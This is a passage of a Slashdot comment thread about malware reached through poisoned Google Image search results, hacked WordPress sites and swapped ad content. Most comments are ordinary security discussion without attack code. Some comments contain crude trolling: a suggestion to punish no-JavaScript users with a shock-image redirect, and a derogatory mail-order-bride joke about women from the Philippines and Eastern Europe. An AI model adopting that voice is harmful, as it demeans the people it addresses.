      The vast majority of these hacks are done by either inserting malicious code into a 3rd party ad served alongside the page content or by hacking sites that are not well administered. In the case of the ad exploit, the hackers get one ad approved, then swap out the content after the approval. They get away with it because the ad network does not properly track things and because they're not verifying the source. In the case of the obscure web site that gets hacked, the hackers use a tool to inject code into the existing pages, or break in via weak / sniffed FTP passwords and then insert code. The hacker then uses email or redirects / links on other sites to point your browser at the infected site.

      Whitelists are not a perfect defense, but having a whitelist with a few dozen or few hundred sites reduces your infection risk to just those sites. Now the attacker's job just got a lot more difficult. It's not good enough that they hack a random site out there and trick you into visiting the link, they have to hack a site that is on your unique whitelist. That can easily cut your risk factor by a few orders of magnitude.

      (The major weakness of whitelists is that popular sites are likely whitelisted by the user. So if a major breach occurs, you're still screwed. On the flip side, the popular sites are hopefully better admin'd, monitored and protected.)

      --
      Wolde you bothe eate your cake, and have your cake?
  12. Re:I see how it is by Anonymous Coward · · Score: 0

    "bombing" is innocuous and comedic? I take it there hasn't been a war in your country recently.

  13. Web 101: Google don't fuckin work without js by poptones · · Score: 1

    That's the problem. They had a GREAT web search page but then had to fuck it up with IFRAMES (web security 101: IFRAMES are not made for use outside a corporate firewall) and eight layers of javascript. I use google image search a LOT and the solution ultimately came down to me carving out a command line google grabber as a means to avoid all their bullshit.

    gggrabber -a -s xga +its+britney+bitch|wget -i -

    It sucks not having instant real time update on search terms, but it's a lot less dangerous to sort through a bunch of extraneous images than to use that fucked up "improved" google image search.

  14. A suggestion to browser vendors by Anonymous Coward · · Score: 0

    FTFA: but believes that Google could help by not using an iframe to display the results.
    The browser vendors could help by making it impossible for an iframe from a different domain to do anything to the page outside it, including navigating away. I've had this happen quite recently; it wasn't trying to serve me malware, just a run-of-the-mill ‘break-out-of-frames’ script, but it was still mightily annoying.

  15. Linux will be infected soon. by Anonymous Coward · · Score: 0

    It's only a matter of time. Mac users got popular enough and now they have it. With many gullible people using Linux being tricked into a false sense of security. Android is already targeted, and the viruses will infect "PC" Linux after that. I look forward for the smug to be wiped off Slashdot users' faces.

  16. Only windows is attacked? by SpaceLifeForm · · Score: 1

    They do not mention what the malware is.

    --
    You are being MICROattacked, from various angles, in a SOFT manner.
    1. Re:Only windows is attacked? by Anonymous Coward · · Score: 0

      It's attacking OSX machines as well as windows; doesn't seem to attack Linux yet.

      Interestingly, the pages adapt the content for the browser being used, to make it look like it's the browser doing the scan.

  17. Google Images falling downhill by Anonymous Coward · · Score: 1

    I've pretty much stopped using them since they switched over to the "improved" interface where the images increase by 20% when you hover over them. Doesn't improve visibility, and obscures the surrounding images. I was spending more time trying to find a safe spot to park my cursor than looking at the results.

    Then instead of linking to the page with the image on it, it links to some intermediary page. Requires scripts, with no easy way to switch back to the old interface, and with NoScript on, it often just gives a "no results found" return on any search criteria. In a word, crap.

  18. Mostly a WordPress / PHP problem by Animats · · Score: 1

    This isn't really a search problem. The problem is break-ins to vulnerable sites that replace site content with phony pages leading to attacks. Google is finding the phony pages and indexing them. Mostly it's a WordPress or PHP problem.

  19. Bing sometimes plays dirty by simoncpu+was+here · · Score: 1

    I've personally reported poisoned links that transfer the users into Bing image search. Whether it's unintentional or not, it tricks some users into using Bing instead.

  20. "whether I'll be moving her..." by Anonymous Coward · · Score: 0, Flamebait

    You talk about your wife as though she has no say in the matter and she has to accept whatever you decide. What century are you living in?

    1. Re:"whether I'll be moving her..." by Anonymous Coward · · Score: 1

      Since this is Slashdot, he probably bought her from the Philippines or Eastern Europe.

    2. Re:"whether I'll be moving her..." by gmhowell · · Score: 1

      Since this is Slashdot, he probably bought her from the Philippines or Eastern Europe.

      That's where realdolls ships from?

      --
      Jesus was all right but his disciples were thick and ordinary. -John Lennon
  21. NOSCRIPT should redirect to goatse by cheekyboy · · Score: 1

    To punish the noscript people, let's all redirect them Linux clients with no JavaScript to goatse

    That will be funny.

    And if your Linux is SOOO secure, running JS will have no bad impact.

    Get a clue. Or buy an iPad and do your browsing there.

    --
    Liberty freedom are no1, not dicks in suits.
  22. Safety first! by Anonymous Coward · · Score: 0

    On my workstation [Linux] JavaScript has always been disabled and Flash is not installed either. If I absolutely have to enable JavaScript for some site, I start a VM where the rootfs is mounted on ramdisk so any changes made are cleaned at shutdown. This post is written from within the VM.

  23. Interrupting dialogue box by Daghead · · Score: 1

    Most people are not going to disable JavaScript because they can't comprehend it or it's too much of a nuisance. NoScript is great though when you set it to ignore bookmarks and can just hit "allow all this page". What bothers me most about this crap is the dialogue box used to interfere with closing the tab, also allowing the tab to reappear with session restore if you kill the whole window. The average n00bs have to be falling for this like dominoes. https://lh5.googleusercontent.com/_s3wM0-7Zzhg/TZ9zJ7IKr3I/AAAAAAAAASY/SYcC0tJPJZ0/Browser%20exploit%20rage%2002.png Subscribing to Sophos Labs' YouTube channel has been rewarding: http://youtu.be/9Xna558F_m8

  24. Taking their money is required by currently_awake · · Score: 1

    They do this because it pays (same with spam). When it stops paying they will stop doing it.

  25. no corporate responsibility by currently_awake · · Score: 1

    It's the new world order where only individuals are liable, not corporations. What's the point of being rich and powerful if you have to behave? Next thing you know people might suggest that banks that lose all their money be allowed to go broke or politicians who pass illegal laws go to jail.

  26. Sounds like selection bias by zippthorne · · Score: 1

    We have some very high traffic sites, and outside of web crawlers, I don't believe we've seen it blocked, ever.

    And do you have a way in place to measure it?

    I've never seen a bear crap in the woods. But that doesn't mean I'd claim that bears never crap in the woods. It just means that I don't go hiking in woods where I'm likely to encounter bears at all.

    --
    Can you be Even More Awesome?!
  27. But there's way too much information by Anonymous Coward · · Score: 0

    to decode the Matrix...

  28. Don't pirate images by Anonymous Coward · · Score: 0

    And the moral behind this incident is get a life, and stop pirating images!

    1. Re:Don't pirate images by Anonymous Coward · · Score: 0

      Absolutely! You should not steal anyone's images, even if Google has been intermediary in the theft.

      Of all the images that you find on Google's image search, they will have been harvested from web sites that clearly state that the web page has been published by and is copyrighted to some entity... and Google is not the Copyright owner, nor does Google have the right to display images owned by other entities.

      The whole thing is not only ethically wrong, it is in fact illegal!

  29. WordPress vulnerabilities and Drupal security by Anonymous Coward · · Score: 0

    Interesting that WordPress sites are often compromised, due to poor maintenance and lack of knowledge about vulnerabilities. The Drupal community has a more distributed approach to security, and with default settings your site will alert you if a component is updated for security reasons. Of course, there are owners of Drupal sites that ignore these warnings and may introduce vulnerabilities with poorly written custom code. Ah well.